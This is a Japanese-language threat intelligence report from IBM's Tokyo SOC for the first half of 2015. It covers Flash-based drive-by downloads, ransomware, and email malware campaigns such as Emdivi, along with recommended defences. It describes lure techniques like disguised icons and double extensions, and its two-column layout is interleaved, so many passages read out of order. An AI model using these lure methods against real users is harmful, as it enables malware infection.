2015年上半期 Tokyo SOC 情報分析レポート（PDFファイル、約

IBM Security Services
Ahead of the Threat. ®
2015 年上半期
Tokyo SOC
情報分析レポート
目
次
エグゼクティブ・サマリー ...................................................................... 3
1
2015 年上半期の脅威動向概況 ............................................................ 4
1.1 2015 年上半期のセキュリティー・アラートの推移.................................................. 4
[Column1] 世界のセキュリティー・オペレーション・センターから ................................. 7
2
クライアント PC を狙った攻撃 ............................................................ 9
2.1 ドライブ・バイ・ダウンロード攻撃 ..................................................................... 9
2.2 メールを悪用する攻撃 .................................................................................... 16
2.3 クライアント PC を狙った攻撃のまとめ .............................................................. 24
[Column2] IBM X-Force Exchange のご紹介 ........................................................... 25
3
公開サーバーに対する攻撃の動向 ........................................................ 28
3.1 今期のサーバーにおける脆弱性概況 ................................................................... 28
3.2 HTTP.sys の脆弱性に対する攻撃 ....................................................................... 30
3.3 Elasticsearch の脆弱性に対する攻撃 ................................................................. 31
3.4 ShellShock 攻撃(続報) ................................................................................... 32
3.5 Heartbleed 攻撃
(続報) ................................................................................ 37
3.6 SQL インジェクション .................................................................................... 39
3.7 公開サーバーに対する攻撃の動向のまとめ .......................................................... 41
[Column3] 攻撃元 IP アドレスからみる ShellShock 脆弱性を利用した攻撃の分析 ............. 42
4
おわりに ....................................................................................... 48
2
2015 年上半期 Tokyo SOC 情報分析レポート
エグゼクティブ・サマリー
エグゼクティブ・サマリー
本レポートは、IBM が全世界 10 拠点のセキュリティー・オペレーション・センター（SOC）にて観
測したセキュリティー・イベント情報に基づき、主として日本国内の企業環境で観測された脅威動向
を、Tokyo SOC が独自の視点で分析・解説したものです。
IBM では、世界 10 拠点の SOC で 10 年以上蓄積されてきたセキュリティー・インテリジェンスを
相関分析エンジン(X-Force Protection System)へ実装し、1 日あたり 200 億件以上の膨大なデータをリ
アルタイムで相関分析しています。
2015 年上半期に Tokyo SOC で観測された攻撃を分析した結果、
以下の実態が浮かび上がりました。
メール添付型のマルウェアの通信を多数検知
日本年金機構の報道でもメール経由でのマルウェア感染が大きく取り上げられましたが、Tokyo
SOC でもメール添付型のマルウェアに感染した端末が外部サーバーと通信するケースを検知して
います。いわゆる標的型攻撃に対して防御だけを目的とした既存の対策に限界があり、一方、ばら
まき型のメールウィルスに関しても不審なメールを開封しないようにコントロールすることが難し
いことがわかります。まさに感染を想定した運用管理体制の構築が急務となっています。
約 40%の組織でドライブ・バイ・ダウンロード攻撃を確認
2014 年下半期に減少していたドライブ・バイ・ダウンロード攻撃は増加傾向を示し、攻撃が確認
された組織は前期の 16.9%から 40.5%に増加しました。誘導元として改ざんされた Web ページ以外
に、広告配信ネットワークを悪用してマルウェア感染サイトにリダイレクトするケースも見られま
した。また、観測されたドライブ・バイ・ダウンロード攻撃の 90%以上が Adobe Flash Player の脆
弱性を悪用するものでした。
相次ぐ脆弱性と継続する過去の脆弱性への攻撃
GHOST、FREAK、Logjam、VENOM といった新たな脆弱性が発見されるとともに、2014 年の
ShellShock や Heartbleed も継続して攻撃を検知しています。脆弱性の公開直後から攻撃が発生する
傾向にも変わりはないため、平時の情報収集やアセット管理の重要性が再認識されました。
また、本レポートでは日本以外での脅威動向やこれまで蓄積した検知データをもとに攻撃元、攻撃
先の IP アドレスの相関についての分析結果をご紹介いたします。
これらの情報を、セキュリティー・ポリシーの策定や、情報セキュリティー対策を検討する際の参
考として、また、情報セキュリティーに関する知識向上の一助として、ご活用いただければ幸いです。
3
2015 年上半期 Tokyo SOC 情報分析レポート
2015 年上半期の脅威動向概況
1 2015 年上半期の脅威動向概況
2015 年上半期は、Windows で使用される HTTP プロトコルスタックの脆弱性や暗号化通信で使用
されるプロトコルの脆弱性が話題となりましたが、脅威動向としては以前に公開された OpenSSL の脆
弱性に対する攻撃なども引き続き確認されております。また、クライアント環境を攻撃対象としたマ
ルウェアも継続して確認されており、マルウェアの侵入を発端とする大規模な情報漏えい事件が各種
メディアでも報道されることとなりました。
本章では、全世界 10 拠点の IBM SOC で発生したセキュリティー・アラートおよび 2015 年上半期
に公開されたグローバル・レポートから今期に発生した攻撃について、世界と日本の動向の比較を交
えて解説します。
1.1 2015 年上半期のセキュリ
ティー・アラートの推移
図 1 は IBM SOC が対応したセキュリティー・ア
ラートの件数の推移です。これらのアラートは、セ
以上のセキュリティー・イベントを相関分析エンジ
ンで分析を行った結果、アナリストが調査すべきと
判断したものです。アラート数としては、一時的な
変動はあるものの全体としては大きな増減はありま
せんでした。
キュリティー機器から収集した 1 日あたり 200 億件
図 1. IBM SOC で対応しているセキュリティー・アラートの傾向
(2015 年 1 月 1 日∼6 月 30 日)
4
2015 年上半期 Tokyo SOC 情報分析レポート
2015 年上半期の脅威動向概況
ただし、アナリストが高危険度と判断したアラー
トは、2014 年下半期と比べ国内の件数比率が増加す
国内でも多くみられたことが要因のひとつと考えら
れます。
る結果となっています(図 2)。これは Tokyo SOC に
て観測を行う国内の環境にて 2015 年上半期後半か
らマルウェアの感染活動を多く検知したためであり、
Adobe Flash Player の脆弱性を狙った攻撃の影響が
図 2. IBM SOC で高危険度と判断したセキュリティー・アラート比率
(2014 年 7 月 1 日∼12 月 31 日および 2015 年 1 月 1 日∼6 月 30 日)
サーバーを対象とした攻撃という観点では、2015
年の上半期には 2014 年下半期から継続して暗号化
通信の傍受や改ざんをおこなえる脆弱性（FREAK、
Logjam など）が多く公開されることとなりました。
性の公開から時間がたっている場合でも、脅威はか
わらず存在しているといえます。
これらの話題となった脆弱性に対する攻撃の動向
の詳細については 3 章で解説します。
これらの脆弱性の利用には中間者攻撃と組み合わせ
る必要があるため、一般的な対策を行っている組織
一方で、クライアント PC を対象とした攻撃は、
での攻撃成功は限定されますが、多くのサーバーや
サーバーを標的とした攻撃以上に顕著な形で多くの
クライアントで依然として古い暗号システムが利用
脅威を確認しました。2015 年上半期には日本年金
可能となっている実態が浮かび上がりました。
機構において、マルウェア感染による大規模な情報
また、2015 年上半期は Windows の HTTP プロ
漏えい事件が発生しましたが、IBM SOC でも 2014
トコルスタック(HTTP.sys)に関する脆弱性が公開
年下半期と同様にメール経由及びドライブ・バイ・
されましたが、この脆弱性への攻撃は脆弱性の公開
ダウンロード攻撃によるマルウェア感染や、マルウ
当初から検知しています。脆弱性公開から攻撃発生
ェア感染後に行われる Command & Control 通信
までの期間が非常に短い傾向に変わりはなく、迅速
(C&C 通信)を日々検知しています。この傾向は国内
な対応が求められる結果となりました。
のみならず世界全体でも同じであり、日本以外の環
さらに、2015 年以前の脆弱性を狙った攻撃とな
りますが Heartbleed 攻撃も継続して確認していま
す。実際、6 月後半には IBM SOC 全体で多い日に一
境では Dyre や Dyreza と呼ばれるマルウェアが猛
威を振るうなどの活動が見られました(図 3 1)。
また、2015 年上半期は Adobe Flash Player の脆
日あたり約 40 万件を超えるセキュリティー・イベ
弱性が多数公開されました。この脆弱性のなかには
ントを検知しています。このことから、たとえ脆弱
公開時点で修正プログラムが存在しないものもあり、
5
2015 年上半期 Tokyo SOC 情報分析レポート
2015 年上半期の脅威動向概況
攻撃ツールでも多く利用されていました。この結果
として、2014 年下半期には Tokyo SOC での検知数
が減少していたドライブ・バイ・ダウンロード攻撃
1
The Dyre Wolf,
https://portal.sec.ibm.com/mss/html/en_US/support_resourc
es/pdf/dyre_wolf_4-2-2015.html
は大幅に増加しています。
クライアント PC を対象とした攻撃については 2
章で解説します。
図 3. IBM SOC で確認された Dyre マルウェアの地域別検知数の推移
(2014 年 6 月∼2015 年 2 月、引用: IBM MSS THE DYRE WOLF)
6
2015 年上半期 Tokyo SOC 情報分析レポート
[Column1] 世界のセキュリティー・オペレーション・センタ
ーから
IBM SOC では脅威動向の分析結果をトピックごとにレポートとして公開 2しています。2015 年には特に
2014 年全体を振り返って各脅威トピックに対する脅威動向をお伝えしています。本コラムでは 2015 年上
半期のレポートからいくつかを取り上げ、世界での攻撃動向をお伝えします。
l
Content Management Systems
IBM MSS THE RISKS OF CONTENT MANAGEMENT SYSTEMS
https://portal.sec.ibm.com/mss/html/en_US/support_resources/pdf/cms_threats_2-25-2015.html
Web コンテンツを構成するテキストや画像などの要素を管理し、配信などの処理を行うソフトウェ
アであるコンテンツ・マネジメント・システムは、今や多くの組織において使用されていますが、
攻撃を行う側から見た場合にも非常に魅力的な攻撃対象となっています。このレポートではコンテ
ンツ・マネジメント・システムに存在するさまざまな脆弱性と脅威をお伝えしています。特にコン
テンツ・マネジメント・システムの 1 つである WordPress に対して 2014 年に行われた攻撃は 7 割
以上が小売業を対象としており、標的となる対象がはっきりとした脅威でした。
図4. 2014年に確認された WordPress を対象とした攻撃活動数
(引用: IBM MSS Threat Research Papers: THE RISKS OF CONTENT MANAGEMENT SYSTEMS 3)
7
2015 年上半期 Tokyo SOC 情報分析レポート
l
Industry Overview - Critical Infrastructure
IBM MSS INDUSTRY OVERVIEW – CRITICAL INFRASTRUCTURE (BASIC NEEDS)
https://portal.sec.ibm.com/mss/html/en_US/support_resources/pdf/industry_overview_crit_infra_3-2
5-2015.html
社会の重要インフラを狙った攻撃は今や多くの国々が直面する問題の 1 つとなっています。2014
年に世界全体の IBM SOC で検知したセキュリティー・インシデントのうち、生活に直接の影響を
及ぼす可能性の高い環境におけるセキュリティー・インシデントが 2013 年と比べて減少傾向にあ
るものの、約 8 パーセントを占める結果となったことが分かっています。なお、攻撃手法の種別で
みた場合も同様であり、2014 年に発生した ShellShock や Heartbleed が含まれる Unauthorized
Access (不正アクセス)の項目を除いてインシデントの件数は減少しています。環境によっては脅威
への対策が十分ではない古いシステムを使っていて、引き続き対策が必要であるといえます。
図5. 2014年に発生した重要インフラを狙ったセキュリティー・インシデントの脅威種別
(引用: IBM MSS INDUSTRY OVERVIEW – CRITICAL INFRASTRUCTURE (BASIC NEEDS 4)
2
3
4
IBM, MSS Threat Research Papers, https://portal.sec.ibm.com/mss/html/en_US/support_resources/threat_papers.html
Content Management Systems: https://portal.sec.ibm.com/mss/html/en_US/support_resources/pdf/cms_threats_2-25-2015.html
Industry Overview - Critical Infrastructure:
https://portal.sec.ibm.com/mss/html/en_US/support_resources/pdf/industry_overview_crit_infra_3-25-2015.html
8
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
2 クライアント PC を狙った攻撃
クライアント PC を狙った攻撃では、攻撃者は主に Web サイトやメールを悪用して侵入します。そ
の後、侵入したクライアント PC を踏み台にして、組織内の奥深くにあるシステムの破壊や情報の窃
取を行います。
本章では、2015 年上半期に Tokyo SOC で確認したこれらの攻撃の特徴および動向について解説し
ます。
2.1 ドライブ・バイ・ダウンロード
攻撃
ドライブ・バイ・ダウンロード攻撃は、Web サイト
の閲覧を通じてクライアント PC へマルウェアを感染
させる攻撃手法です。攻撃者は、一般の Web サイト
や広告コンテンツを改ざんすることで、それを閲覧し
たユーザーを自動的に攻撃サーバーへ接続させ、クラ
イアント PC の脆弱性を悪用してマルウェアに感染さ
せます。
今期は Adobe Flash Player の脆弱性が相次いで明ら
かとなり話題になりました。公開された脆弱性は次々
に攻撃ツール（Exploit Kit）に組み込まれ、広く攻撃に
悪用されました。この影響により、Tokyo SOC でもド
ライブ・バイ・ダウンロード攻撃の検知数が増加しま
した。
また、Adobe Flash Player の脆弱性は、特定の標的
を意識したドライブ・バイ・ダウンロード攻撃（水飲
み場攻撃）への悪用も確認され、メールによる標的型
攻撃でも話題となったマルウェア「Emdivi」へ感染す
る事例も発生しています。
n ドライブ・バイ・ダウンロード攻撃の検知傾向
図 6 は、Tokyo SOC におけるドライブ・バイ・ダウ
ンロード攻撃の検知数の推移です。2015 年上半期の検
知総数は 2,740 件と、2014 年下半期の 887 件と比較
して約 3 倍に増加しました。
攻撃の増加は、Adobe Flash Player の脆弱性が多数
公開され、
攻撃に悪用されたことが要因です。
表 1 は、
2015 年 1 月から 7 月にかけて公表され、攻撃への悪
用が確認された Adobe Flash Player の脆弱性の一覧で
す。毎月新たな脆弱性が公表されており、修正プログ
ラムが公表される前に悪用が確認された事例（ゼロデ
イ攻撃）はこのうち 7 件に及びました。
9
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
2015 年 7 月にはイタリアのセキュリティー企業
Flash Player の脆弱性 (CVE-2015-5119) を悪用する
Hacking Team から複数のゼロデイ脆弱性が漏えいし
攻撃を多数検知しており、7 月のドライブ・バイ・ダ
ました。Tokyo SOC では、特定の攻撃ツール（Angler
ウンロード攻撃の検知数は、2012 年 7 月以降で最多
Exploit Kit）が、これらの脆弱性の１つである Adobe
となる 1,507 件となりました。
1,600
1,400
検知数
1,200
1,000
800
600
400
200
2012年7月
2012年8月
2012年9月
2012年10月
2012年11月
2012年12月
2013年1月
2013年2月
2013年3月
2013年4月
2013年5月
2013年6月
2013年7月
2013年8月
2013年9月
2013年10月
2013年11月
2013年12月
2014年1月
2014年2月
2014年3月
2014年4月
2014年5月
2014年6月
2014年7月
2014年8月
2014年9月
2014年10月
2014年11月
2014年12月
2015年1月
2015年2月
2015年3月
2015年4月
2015年5月
2015年6月
2015年7月
0
図 6. ドライブ・バイ・ダウンロード攻撃の月別検知数推移(日本国内)
（Tokyo SOC 調べ：2012 年 7 月 1 日∼2015 年 7 月 31 日）
表 1. ドライブ・バイ・ダウンロード攻撃に悪用された Adobe Flash Player の脆弱性
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 7 月 31 日）
公開月
脆弱性識別番号
ゼロデイ脆弱性
2015 年 1 月
CVE-2015-0310 (APSB15-02)
✔
2015 年 1 月
CVE-2015-0311 (APSA15-01/APSB15-03)
✔
2015 年 2 月
CVE-2015-0313 (APSA15-02/APSB15-04)
✔
2015 年 3 月
CVE-2015-0336 (APSB15-05)
2015 年 4 月
CVE-2015-3043 (APSB15-06)
2015 年 4 月
CVE-2015-0359 (APSB15-06)
2015 年 5 月
CVE-2015-3090 (APSB15-09)
2015 年 6 月
CVE-2015-3104 (APSB15-11)
2015 年 6 月
CVE-2015-3105 (APSB15-11)
2015 年 6 月
CVE-2015-3113 (APSB15-14)
✔
2015 年 7 月
CVE-2015-5119 (APSA15-03/APSB15-16)
✔
2015 年 7 月
CVE-2015-5122 (APSA15-04/APSB15-18)
✔
✔
10
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 悪用される脆弱性と対策
図 7 はドライブ・バイ・ダウンロード攻撃で悪用さ
は攻撃ツールに組み込まれていません。修正プログラ
れた脆弱性の割合です。今期 Tokyo SOC で検知した
ムの提供から時間が経過したことにより、攻撃の成功
ドライブ・バイ・ダウンロード攻撃は、99%が Adobe
率は低下していると考えられます。2014 年下半期には、
Flash Player の脆弱性を悪用した攻撃でした。
ドライブ・バイ・ダウンロード攻撃の件数が減少しま
これまで本レポートでは、Oracle Java Runtime
したが、これは成功率の低下により、攻撃者がドライ
Environment(JRE)の脆弱性を、最も狙われる脆弱性と
ブ・バイ・ダウンロード攻撃自体をあまり利用しなく
して報告してきました。しかしながら、今期は 1 月∼
なっていたことも要因と考えられます。しかし、今期
3 月に少数の攻撃が検知された後、4 月以降は JRE の
多くのクライアント PC にインストールされている
脆弱性を狙う攻撃は確認されていません。
Adobe Flash Player に多数の脆弱性が発見されたこと
この傾向の変化は、JRE に悪用可能な脆弱性が公表
で攻撃の成功率が上昇し、攻撃者が改めてドライブ・
されなくなった一方、Adobe Flash Player に多数の脆
バイ・ダウンロード攻撃を利用するようになったと考
弱性が公表されたことが要因と考えられます。攻撃ツ
えられます。
ールに組み込まれている JRE の脆弱性は、2013 年以
前に公表されたものが多く、最近の脆弱性は積極的に
0.1%
0.9%
Adobe Flash Playerの脆弱性
JREの脆弱性
Adobe Readerの脆弱性
99.0%
図 7. ドライブ・バイ・ダウンロード攻撃で悪用された脆弱性の割合(日本国内)
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
11
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
Adobe Flash Player は、引き続き主要な攻撃対象と
のみ選択して実行可能な設定（Click to play）も可能で
なることが予想されます。そのため、Tokyo SOC では
す。このような設定を行うことで、修正プログラム公
以下のような対策を推奨しています。
表前の攻撃（ゼロデイ攻撃）が発生している場合や、
Ø
最新版へのアップデート
アップデート実施までのタイムラグがある場合でも脆
Ø
ブラウザ・プラグインの無効化または自動的に
弱性による攻撃のリスクを低減できます。Click to play
実行しない設定（Click to play）への変更
を設定した場合の利用イメージは図 8 の通りです。
なお、プラグインの設定はブラウザごとに実施する
●最新版へのアップデート
必要があります。具体的な設定方法は、各ブラウザの
基本的な対策は、最新版へのアップデートの実施で
ヘルプページ等を参照の上設定してください
。
56 7
す。アップデートが適切に実施されていれば、万一攻
撃サーバーへアクセスさせられてしまっても、修正済
みの脆弱性を悪用した攻撃の影響を受けることはあり
ません。
●ブラウザ・プラグインの無効化または自動的に実
行しない設定（Click to play）への変更
5
Internet Explorer のアドオンを管理する（Microsoft）
http://windows.microsoft.com/ja-jp/internet-explorer/manageadd-ons#ie=ie-11
6
Adobe Flash を”クリックして実行”する設定にする（Mozilla）
https://support.mozilla.org/ja/kb/set-adobe-flash-click-play-fir
efox
7
Chrome でプラグインを使用する（Google）
https://support.google.com/chrome/answer/142064?hl=ja
ブラウザ・プラグインは無効化することが可能であ
り、Google Chrome や Mozilla Firefox では必要な場合
Click to play未設定の場合
Click to playを設定した場合
図 8. Click to play 設定時と未設定時の違い（Google Chrome の場合）
（参照サイト：Adobe Flash Player のバージョンテスト
http://www.adobe.com/jp/software/flash/about/）
12
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 攻撃が検知された組織の割合
ドライブ・バイ・ダウンロード攻撃は図 9 のような
複数のステップを経てマルウェア感染およびその後の
被害に至ります。
図 10 は Tokyo SOC でクライアント PC による通信
を監視している組織のうち、ドライブ・バイ・ダウン
ロード攻撃が検知された組織の割合です。2015 年上半
期にドライブ・バイ・ダウンロード攻撃が検知された
組織（図 9 の Step 2 以降が確認された組織）の割合は
40.5%であり、2014 年下半期の 16.9%から約 2.4 倍に
増加しました。今期のドライブ・バイ・ダウンロード
攻撃は、改ざんされた Web サイトの閲覧のほか、攻
撃サーバーへアクセスさせる悪意ある広告の閲覧によ
って発生したことが確認されています。攻撃が検知さ
れた組織の割合の増加は、Adobe Flash Player の脆弱
性悪用を狙う攻撃者が、Web サイトの改ざんや不正な
広告の配信を積極的に行ったことが要因と考えられま
す。
また、Step 3 以降の攻撃が検知された組織の割合は
21.4％でした。Step 3 以降の攻撃は、攻撃サーバーへ
アクセスした時点で脆弱性を持つ Adobe Flash Player
を利用していた場合にのみ行われます。他のアプリケ
ーションへの影響が大きいことからアップデートを慎
重にならざるを得ないことが課題となっていた JRE
に比べ、Adobe Flash Player はアップデートが実施し
やすいアプリケーションといえます。それにもかかわ
らず Step 3 以降の攻撃が高い割合で行われています。
つまり、多くの組織で脆弱性を持つ Adobe Flash
Player が使用されていたということであり、アップデ
ートや回避策のタイムリーな適用が困難であることが
改めて示されたといえます。
Step 1
改ざんされたサイトや広告の閲覧
Step 2
PCの脆弱性の調査
攻撃サーバーへの誘導
危険度
Step 3
PCの脆弱性を悪用する攻撃
Step 4
マルウェアのダウンロード
脆弱性が存在
脆弱性の悪用が成功
Step 5
マルウェアの実行
Step 6
C&Cサイトへの通信/命令受信
Step 7
目的の遂行
マルウェア感染が成功
攻撃者が感染PCの制御に成功
図 9. ドライブ・バイ・ダウンロード攻撃のステップ
13
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
21.4%
59.5%
19.1%
脆弱性を悪用する攻撃が検
知された組織
（Step3以降の検知あり）
攻撃サーバーへの誘導を検
知した組織
（Step3以降の検知なし）
攻撃サーバーへの誘導が検
知されなかった組織
図 10. ドライブ・バイ・ダウンロード攻撃発生状況(日本国内)
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
14
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 感染するマルウェア
ドライブ・バイ・ダウンロード攻撃で感染するマル
り当てにより、共有フォルダをドライブとして利用可
ウェアは背後にいる攻撃者の目的により様々ですが、
能にしている場合、共有フォルダ内のファイルも暗号
今期 Tokyo SOC で確認した攻撃では主に「Bedep」や
化の対象となります。そのため、企業環境においては、
「CryptoWall 3.0」への感染を狙う攻撃が目立ちまし
1 台の感染により共有フォルダ内のファイルが利用不
た。
能となる思わぬ影響を及ぼす可能性があります。ラン
「Bedep」は、感染したホストに自動的に広告を閲
サムウェアによる被害を想定した場合に有効な対策は
覧させる動作を行います。攻撃者は、感染ホストから
バックアップの取得です。システムの完全なバックア
大量に広告を閲覧させることで、不正に広告収入を得
ップの取得が困難である場合には、失われた場合の影
ていると考えられます。また、別の不正ソフトウェア
響が大きいファイルだけでもバックアップを取得して
をダウンロードする機能も備えています。
おくことで、影響を緩和できます。
「CryptoWall 3.0」はランサムウェアの一種です。
ランサムウェアについては、情報処理推進機構
ランサムウェアとは、感染したホスト内のファイルを
（IPA）からも詳しい情報が掲載された注意喚起が公
暗号化し、復号のためと称して金銭の支払いを求める
開されています 8。
マルウェアです。Tokyo SOC では、特に 6 月以降、
「CryptoWall 3.0」への感染を狙う攻撃を多数確認し
ています。このマルウェアに感染した場合、図 11 の
8
2015 年 6 月の呼びかけ「パソコン内のファイルを人質にとるラン
サムウェアに注意！」（情報処理推進機構）
https://www.ipa.go.jp/security/txt/2015/06outline.html
ような、金銭の支払いを求める画面が表示されます。
ランサムウェアによって暗号化されたファイルの多
くは復号不能です。また、ネットワークドライブの割
図 11. CryptoWall 3.0 感染時に表示される画面の例
15
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
2.2 メールを悪用する攻撃
その後、同様の攻撃によるマルウェア感染被害が複数
の組織で報告されたり、この攻撃自体が以前から行わ
メールを悪用する攻撃は、ドライブ・バイ・ダウン
ロード攻撃と並んでクライアント PC に対する主要な
攻撃手段です。攻撃者は、不正な添付ファイルやリン
クを含むメールを送信し、ファイルを開かせたり、リ
ンクをクリックさせたりすることでマルウェアに感染
させようとします。Tokyo SOC では、送受信されるメ
ールを、IDS/IPS やサンドボックス型のセキュリティ
ー製品にて監視しています。
今期は、6 月 1 日に公表された日本年金機構におけ
るマルウェア感染および情報漏えい事件を発端として、
メール経由の標的型攻撃に改めて注目が集まりました。
この事件は、通常のメールを装ったメールに添付さ
れたファイルを開くことによりマルウェアに感染する
ことで発生した標的型攻撃であると報道されました。
れているものであることが報告されたりするなど、特
定の組織や個人を狙った攻撃ではなく、主に日本の組
織を対象として行われている攻撃の一部であることが
明らかになってきました 9。Tokyo SOC でも、同様の
攻撃を確認しています。
また、2014 年下半期に紹介した不正なマクロを含む
ファイルを添付したメールなど、不特定多数に対して
行われる攻撃も引き続き多数検知しています。
本項では、Tokyo SOC で確認されたメールを悪用す
る攻撃の傾向や事例について紹介します。
9
ブルーターマイト∼日本を標的にする APT 攻撃∼（プレスカンフ
ァレンス資料）（株式会社 Kaspersky Labs Japan）
http://media.kaspersky.com/jp/Kaspersky_BlueTermite-PR-101
3.pdf
16
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 利用される添付ファイルの形式
図 12 は、検知された不正な添付ファイルの形式別
するポリシーを定めていたりします。攻撃者は、その
の割合です。今期も圧縮形式のファイルが添付された
ような制限を回避するために実行形式のファイルは圧
メールを多数検知しました。特に ZIP 形式が 93.1%を
縮し、ファイル形式を変更して送信していると考えら
占めており、その他 RAR、7zip、lzh 形式が利用され
れます。
非圧縮のファイルでは、主に Microsoft Word 形式
ています。
展開後のファイルは 99%以上が実行形式のファイ
（doc / docx）のドキュメントファイルが利用されて
ルでした。図 13 は、圧縮形式のファイルを展開した
います。その他、Microsoft Excel 形式（xls）や、Java
後に生成されるファイルの拡張子別の割合です。
アーカイブ（jar）
、リッチテキストフォーマット（rtf）
「exe」が 66.7%、
「scr」が 32.7%と、ほとんどがこ
が確認されています。実行形式ファイルとは対照的に、
の 2 種類となっています。その他、
「com」や「pif」を
ドキュメントファイルのほとんどは圧縮されずに送信
確認しています。メールシステムによっては実行形式
されていました。システム的に受信が制限されるケー
など特定の拡張子を持つファイルの受信を制限できる
スが少ないため、ユーザーが開封しやすいよう非圧縮
ものがあったり、企業環境においては「exe」など実
で送信されていると考えられます。
行形式のファイルが添付されたメールの送受信を制限
1.1%
1.2%
4.6%
ZIP
その他の圧縮形式ファイル
（RAR/7zip/lzh）
Microsoft Word形式
（doc/docx）
その他の非圧縮形式ファイル
（xls/jar/rtf）
93.1%
図 12. 検知された添付ファイルの形式別検知数割合
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
17
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
0.5% 0.1%
32.7%
exe
scr
その他の実行形式（com/pif/dll）
66.7%
その他の非実行形式（doc/rtf）
図 13. 検知された圧縮形式ファイルの展開後ファイル形式別割合
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
18
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 脆弱性の悪用の有無
今期検知されたメールの添付ファイルを利用する攻
一方、脆弱性を悪用する攻撃では、Microsoft Office
撃は、大きく「脆弱性を悪用する攻撃」と「脆弱性を
製品の脆弱性を狙う攻撃が確認されました。今期悪用
悪用しない攻撃」に分けられます。
が確認された脆弱性は以下の通りです。
図 14 は、今期確認された、脆弱性を悪用する攻撃
Ø CVE-2012-0158 (MS12-027)
と脆弱性を悪用しない攻撃の割合です。脆弱性を悪用
Ø CVE-2014-1761 (MS14-017)
する攻撃は全体の 0.4%にとどまっており、2014 年下
Ø CVE-2014-4114 (MS14-060)
半期の 1.4%から引き続き多くが脆弱性を悪用しない
攻撃となっています。
CVE-2012-0158 は、脆弱性公開直後から悪用が確認
され、標的型攻撃を含む多くの攻撃に利用されていた
ものです。また、CVE-2014-1761 および
脆弱性を悪用しない攻撃では、実行形式ファイルを
CVE-2014-4114(別名「Sandworm」)はゼロデイ攻撃
開かせる手法と、不正なマクロプログラムを含むドキ
に悪用されたことで明らかになった脆弱性です。いず
ュメントファイルを開かせ、マクロプログラムを実行
れも公表当初は大きな話題となった脆弱性ですが、修
させる手法が利用されています。
正プログラム提供から時間が経過していることもあり、
実行形式ファイルを添付する手法ではファイルその
現在では攻撃検知数は減少しています。
ものがマルウェアであり、添付ファイルを実行するこ
とで直ちにマルウェア感染につながります。この攻撃
攻撃者は目的達成のため、より成功率の高い攻撃手
では、ファイルのアイコンをドキュメントファイルな
段を選択しています。今期確認された傾向からは、脆
ど別のフォーマットのものに偽装したり、拡張子を 2
弱性を悪用する攻撃と比較し、アイコンや拡張子を細
重に付与したりするなど、ユーザーに実行形式ファイ
工した実行形式ファイルや、悪意あるマクロプログラ
ルと気づかせないようにする細工が行われています。
ムを用いた攻撃のほうが成功しやすい状況にあると考
不正なマクロを利用する手法では、悪意あるマクロ
えられます。しかしながら、今期確認されたドライブ・
プログラムを含むドキュメントファイルを開かせ、マ
バイ・ダウンロード攻撃の増加と同様に、新たに利用
クロを実行させることでマルウェア感染を狙っていま
可能な脆弱性が公表された場合には脆弱性を悪用する
す。実行されるマクロプログラムは脆弱性を悪用する
攻撃の増加も予想されるため、注意が必要です。
ものではなく、通常 Microsoft Office 製品において利用
可能な機能のみを使ってマルウェア感染を試みます。
0.4%
7.0%
脆弱性を悪用する攻撃
脆弱性を悪用しない攻撃
（不正なマクロの利用）
脆弱性を悪用しない攻撃
（実行形式ファイル）
92.5%
図 14. 脆弱性を悪用する攻撃と脆弱性を悪用しない攻撃の検知数割合
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
19
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 攻撃対象を絞って行われる攻撃
（マルウェア「Emdivi」への感染を狙う攻撃）
日本年金機構におけるマルウェア感染および情報漏
えい事件によって、主に日本の組織を対象として行わ
れる、マルウェア「Emdivi」への感染を狙う攻撃が注
目されました。
Tokyo SOC でも、同様の攻撃を確認しています。図
15 は、Tokyo SOC で検知したメールの例です。この
事例では、国内の実在する組織を騙った以下のような
特徴を持つメールが利用されました。
Ø
添付ファイルは lzh 形式で圧縮されており、解
凍後の形式は exe ファイル
Ø
送信元メールアドレスのアカウント名に、成り
すまされた組織名に似た文字列を利用
Ø
メールの件名および添付ファイル名は、該当組
織で開催されたセミナーと同一の名称
Ø
マルウェア（実行形式ファイル）のアイコンを
Microsoft Word のものに偽装
この添付ファイルを実行すると、ダミーの Word 文
書が表示され、バックグラウンドでマルウェアの活動
注目すべき点として、このメールの検知日時が、該
当組織においてセミナー案内が掲示された日と同日で
あった点が挙げられます。特定の組織を騙ったり、公
開情報を流用したりする攻撃は現在では珍しいもので
はありませんが、攻撃者は情報を使いまわすのではな
く、新しい情報を取り込んで攻撃を行っています。
攻撃対象を絞って行われる攻撃は、攻撃発生時点に
おいて多くのセキュリティー製品で対応できない場合
があります。Tokyo SOC で検知した事例でも、検知時
点では主要アンチウイルスソフトウェアのうち 1 製品
を除き検知できていませんでした。また、この攻撃の
被害を受けた組織の多くは、外部からの通報によりマ
ルウェア感染に気づいたとも言われており、感染直後
には被害の発生に気づくことが難しいという実態もあ
ります。このように標的を絞って行われる攻撃は、攻
撃やそれによる影響の発生を即座には気づけないこと
を前提におくことが必要です。
が開始されます。
図 15. マルウェア「Emdivi」への感染を狙う不正なメールの検知例
20
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
n 不特定多数に対して行われる攻撃
（不正なマクロを利用した攻撃）
添付されたファイルを開きマクロを実行してしまう
2014 年下半期の本レポートにおいて、不正なマクロ
